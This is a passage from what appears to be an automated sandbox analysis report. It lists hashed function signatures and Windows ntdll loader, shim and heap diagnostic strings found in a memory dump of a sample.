                                                                                                                          • Opcode Fuzzy Hash: 347d704be55f6460ef29cb0cb275689b6a6170506fd424844f61f1062ad29f08
                                                                                                                          • Instruction Fuzzy Hash: 8A312135514AC8EFEB22CF38C859F9A77E9EF42710F004B98E40297B91D769A984CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • LdrpFindDllActivationContext, xrefs: 1E933440, 1E93346C
                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E933439
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 1E93344A, 1E933476
                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 1E933466
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 3446177414-3779518884
                                                                                                                          • Opcode ID: b6a5710bf1b1c5b8c75e64042f21a2b9225cd67ac1ba2025a132e959a5aeaed2
                                                                                                                          • Instruction ID: d9fe392cb08c0aa9f51a64db782023f14b256274e4f63a828750f34bf80d5f5b
                                                                                                                          • Opcode Fuzzy Hash: b6a5710bf1b1c5b8c75e64042f21a2b9225cd67ac1ba2025a132e959a5aeaed2
                                                                                                                          • Instruction Fuzzy Hash: C0312672E04296EFDB11DB1C8894E5AB2A6FF41354F12932BE845573D0E7B09D80C791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-4253913091
                                                                                                                          • Opcode ID: 715d5987ff5cd6c6d7a61c3de7904ee9af055523c8f92b109b53f60cf098afdc
                                                                                                                          • Instruction ID: 5a0e7e35e886deed81eff555edcc793f4d2dd868f02135df4409e0735353355b
                                                                                                                          • Opcode Fuzzy Hash: 715d5987ff5cd6c6d7a61c3de7904ee9af055523c8f92b109b53f60cf098afdc
                                                                                                                          • Instruction Fuzzy Hash: E5F1BB74A00646DFDB05CF69C890FAAB7B6FF84340F1086A9E4169B385D770E986CF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 1E929F1C
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1E929F2E
                                                                                                                          • LdrpCheckModule, xrefs: 1E929F24
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-161242083
                                                                                                                          • Opcode ID: 4454b554bbdbf199896ee0b0b534366f6b3a92c6498201a5178e4c888ec77912
                                                                                                                          • Instruction ID: cbf62561367d4cd84e7a2d48c57208f7abc4e90c030ca46d6509a0503daed7be
                                                                                                                          • Opcode Fuzzy Hash: 4454b554bbdbf199896ee0b0b534366f6b3a92c6498201a5178e4c888ec77912
                                                                                                                          • Instruction Fuzzy Hash: 2071E374A00246DFCB05DFA8C890AAEB7F5FF85308F584A6DE801E7655E770AD42CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3446177414-0
                                                                                                                          • Opcode ID: 53f7a7f7eecdf867f1971ed4f66323c61b37fa1583b63aa3ed02e8006c798dd4
                                                                                                                          • Instruction ID: 092d43fe143883a121b927e374a626dfd11ac628500905f76195623e22a44596
                                                                                                                          • Opcode Fuzzy Hash: 53f7a7f7eecdf867f1971ed4f66323c61b37fa1583b63aa3ed02e8006c798dd4
                                                                                                                          • Instruction Fuzzy Hash: 7AF1F672E006518FCF19CFA9C9A067DBBF6EF8820071A426DD456DB384E678E941DF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c9e3e686be8c1f9f663a33c64b4887fa3079322b8ef6575134f73da13fbfee74
                                                                                                                          • Instruction ID: 50e296c00b209b5f943c2bdddf16741720900a6fddb2445bd0eb91ff0704fda4
                                                                                                                          • Opcode Fuzzy Hash: c9e3e686be8c1f9f663a33c64b4887fa3079322b8ef6575134f73da13fbfee74
                                                                                                                          • Instruction Fuzzy Hash: C1E10375E00749DFCB25CFA9C980A9DBBF6FF49310F10466AE446A7A64D731A980CF10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: HEAP:
                                                                                                                          • API String ID: 3446177414-2466845122
                                                                                                                          • Opcode ID: 22182e1c772da6f0f9e346a426deeadcb901edeb54b222ccb69e4b8d54e74fc4
                                                                                                                          • Instruction ID: 2a3769fb492648acd28f89015c6d5f00f875142ceec9aee825a248a516ce5bff
                                                                                                                          • Opcode Fuzzy Hash: 22182e1c772da6f0f9e346a426deeadcb901edeb54b222ccb69e4b8d54e74fc4
                                                                                                                          • Instruction Fuzzy Hash: 37A1BE71A183128FDB05CE18C894A1AB7EAFF88310F194A6DE945DB310E7B4EC45DF91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E934530
                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E934507
                                                                                                                          • ExecuteOptions, xrefs: 1E9344AB
                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E934592
                                                                                                                          • Execute=1, xrefs: 1E93451E
                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E934460
                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E93454D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                          • API String ID: 0-484625025
                                                                                                                          • Opcode ID: fab9ac576b09bc3b5df67bfd660facf6f548f220192dd370d00a6e479d1f6baa
                                                                                                                          • Instruction ID: 7a9640222242960772f4aed3a72e4a37b0556946ba30290a25106bfeaef07a72
                                                                                                                          • Opcode Fuzzy Hash: fab9ac576b09bc3b5df67bfd660facf6f548f220192dd370d00a6e479d1f6baa
                                                                                                                          • Instruction Fuzzy Hash: 0251F675A10259AAFF10AAE5DC95FED73ADAF48301F100BA9E505E7280E771EE41CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E927807
                                                                                                                          • SsHd, xrefs: 1E8DA304
                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9277E2
                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9277DD, 1E927802
                                                                                                                          • Actx , xrefs: 1E927819, 1E927880
                                                                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9278F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                          • API String ID: 0-1988757188
                                                                                                                          • Opcode ID: 563bfe220bf47cd813e95cf4f92d2795e38d412afcb410c408b27c7313d7e44c
                                                                                                                          • Instruction ID: 70fc285f9e6c95673e75f1c4e97854aba7e80f324ab866b4441d7cfd122500cf
                                                                                                                          • Opcode Fuzzy Hash: 563bfe220bf47cd813e95cf4f92d2795e38d412afcb410c408b27c7313d7e44c
                                                                                                                          • Instruction Fuzzy Hash: 73E1D070A043428FDB15CE69C890B5AF7E6FF85224F204BADE865DB2D4D731D849CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E929178
                                                                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E929372
                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E929153
                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E92914E, 1E929173
                                                                                                                          • GsHd, xrefs: 1E8DD794
                                                                                                                          • Actx , xrefs: 1E929315
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                          • API String ID: 3446177414-2196497285
                                                                                                                          • Opcode ID: f7044bc4fe1266e43c0ca37e84f501c7f82fa3c5344647e9fe7aff3301d8a4ae
                                                                                                                          • Instruction ID: 7b4a8764ac3cd4837fce9c5dd41c641726853d8fea1f3c215dcc502d1698b3ce
                                                                                                                          • Opcode Fuzzy Hash: f7044bc4fe1266e43c0ca37e84f501c7f82fa3c5344647e9fe7aff3301d8a4ae
                                                                                                                          • Instruction Fuzzy Hash: 09E1B070A043469FDB11CF25C880B5AB7E6BF88354F444B6DE8959B2C5D731E848CF92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                          • API String ID: 3446177414-1745908468
                                                                                                                          • Opcode ID: 18b384e33127fca0262353fb4e974bf0ec5efd455c748d8a10ec7a34768bd636
                                                                                                                          • Instruction ID: 20c838145513a14cddcf383b019a25015a255996720888be889947b0205840f4
                                                                                                                          • Opcode Fuzzy Hash: 18b384e33127fca0262353fb4e974bf0ec5efd455c748d8a10ec7a34768bd636
                                                                                                                          • Instruction Fuzzy Hash: B191FF39904685DFDB02CFA8C490A9EBBF6FF49350F448A5EE841AB761D735A980DF10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 1E8B651C
                                                                                                                            • Part of subcall function 1E8B6565: RtlDebugPrintTimes.NTDLL ref: 1E8B6614
                                                                                                                            • Part of subcall function 1E8B6565: RtlDebugPrintTimes.NTDLL ref: 1E8B665F
                                                                                                                          Strings
                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9197B9
                                                                                                                          • apphelp.dll, xrefs: 1E8B6446
                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E919790
                                                                                                                          • LdrpInitShimEngine, xrefs: 1E919783, 1E919796, 1E9197BF
                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E91977C
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1E9197A0, 1E9197C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-204845295
                                                                                                                          • Opcode ID: 1f7b4fab0a3227757c5f452c6374608327441106a1eca77c81d470835762beb7
                                                                                                                          • Instruction ID: f2c74e71eebb0eb6f22f4d7c00a2f4537afdc843c0e24d194068d2e780be7a87
                                                                                                                          • Opcode Fuzzy Hash: 1f7b4fab0a3227757c5f452c6374608327441106a1eca77c81d470835762beb7
                                                                                                                          • Instruction Fuzzy Hash: C8518B756083599FE321DF24C890E9B77E9FF84654F440B1DF9969B2A0EB30E904CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                          • API String ID: 3446177414-4227709934
                                                                                                                          • Opcode ID: 830446b66006560430c89d6907ff803921c9dc4d6ad41f9ec3f39d6690990f19
                                                                                                                          • Instruction ID: e0b52fcbf4a68b940588e5a181af7de5a40e02f992a6a4e77ce8b04ec5a883ba
                                                                                                                          • Opcode Fuzzy Hash: 830446b66006560430c89d6907ff803921c9dc4d6ad41f9ec3f39d6690990f19
                                                                                                                          • Instruction Fuzzy Hash: 75415FB5A00219ABCB02CFA5C890ADEBBFAFF88355F240219E945A7340D7719D41DF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                          • API String ID: 3446177414-3492000579
                                                                                                                          • Opcode ID: 1041464b8ee69e3bc67c5877b0a1376e5033cc2b0b8618f2c3bf296515bbb7ce
                                                                                                                          • Instruction ID: 27243bccb24469c6eb4aaa66224269eddf6cd9067884a01a211fdf3f6d0af487
                                                                                                                          • Opcode Fuzzy Hash: 1041464b8ee69e3bc67c5877b0a1376e5033cc2b0b8618f2c3bf296515bbb7ce
                                                                                                                          • Instruction Fuzzy Hash: A971DF35904685AFCB02CFA8D4A0AAEFBF6FF89300F48865EE4459B351D731A980DF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • LdrpLoadShimEngine, xrefs: 1E91984A, 1E91988B
                                                                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E919885
                                                                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E919843
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1E919854, 1E919895
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-3589223738
                                                                                                                          • Opcode ID: 649e946b35f347ecc15bed4754ce180f79cd61598a079c33e5486e726189306a
                                                                                                                          • Instruction ID: d454da1610a3bdbe58000adab8b3b6df6067a65876cb10808cbcd94d4d32b4f9
                                                                                                                          • Opcode Fuzzy Hash: 649e946b35f347ecc15bed4754ce180f79cd61598a079c33e5486e726189306a
                                                                                                                          • Instruction Fuzzy Hash: 9C51D375A143A89FCB14DBA8CC94EDD77BAAF81318F480769E541AF295DB70AC40CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 1E8ED879
                                                                                                                            • Part of subcall function 1E8C4779: RtlDebugPrintTimes.NTDLL ref: 1E8C4817
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 3446177414-1975516107
                                                                                                                          • Opcode ID: cbff7b612a3aa7c818455c37d8f9ffe5fbb2e8e34a6a4952b4115be0a1687468
                                                                                                                          • Instruction ID: a241768dc702c77564c51325a8217f04f007d0665e84f4477c91ee2b35bb2623
                                                                                                                          • Opcode Fuzzy Hash: cbff7b612a3aa7c818455c37d8f9ffe5fbb2e8e34a6a4952b4115be0a1687468
                                                                                                                          • Instruction Fuzzy Hash: 6E51E575A0839A9FDB04CFB8C994B8DBBB2BF86304F544759D8016B6C1D770A989CBC0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E96EDE3
                                                                                                                          • Entry Heap Size , xrefs: 1E96EDED
                                                                                                                          • ---------------------------------------, xrefs: 1E96EDF9
                                                                                                                          • HEAP: , xrefs: 1E96ECDD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                          • API String ID: 3446177414-1102453626
                                                                                                                          • Opcode ID: 25a1623dacff15cf725350800febf77a2e99796edbaba1d2f799ffb8fdbe6367
                                                                                                                          • Instruction ID: ba256480e3714dcdf0920962113b83609188490177b8b9311c1ff6e08324d870
                                                                                                                          • Opcode Fuzzy Hash: 25a1623dacff15cf725350800febf77a2e99796edbaba1d2f799ffb8fdbe6367
                                                                                                                          • Instruction Fuzzy Hash: E041AD35A10226DFCB06CF19C4D495ABBEAFF4931472586AEE4089B311E731EE42DF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: $$@
                                                                                                                          • API String ID: 3446177414-1194432280
                                                                                                                          • Opcode ID: 61d22d30e81df562d6639c28a4106e546f06862c74f2bc7f2b843b922fe72db0
                                                                                                                          • Instruction ID: 84e3f341923d72ff255c787ffe564c375197f373989da742f01be61ed1e3e416
                                                                                                                          • Opcode Fuzzy Hash: 61d22d30e81df562d6639c28a4106e546f06862c74f2bc7f2b843b922fe72db0
                                                                                                                          • Instruction Fuzzy Hash: A0812871D00269DBDB22CF54CC45BDEB6B8AF49710F0446EAE909B7280E7709E85CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          • LdrpDynamicShimModule, xrefs: 1E92A7A5
                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E92A79F
                                                                                                                          • apphelp.dll, xrefs: 1E8E2382
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1E92A7AF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 0-176724104
                                                                                                                          • Opcode ID: 825ac499b713df924ee7bb5164bc2f96dfeda84ef63275f78e28710cf8c949d9
                                                                                                                          • Instruction ID: 13fae74ce00e7d5c2ff05a9583d61acce71295cf76952ec7148fd4ca9b776ad3
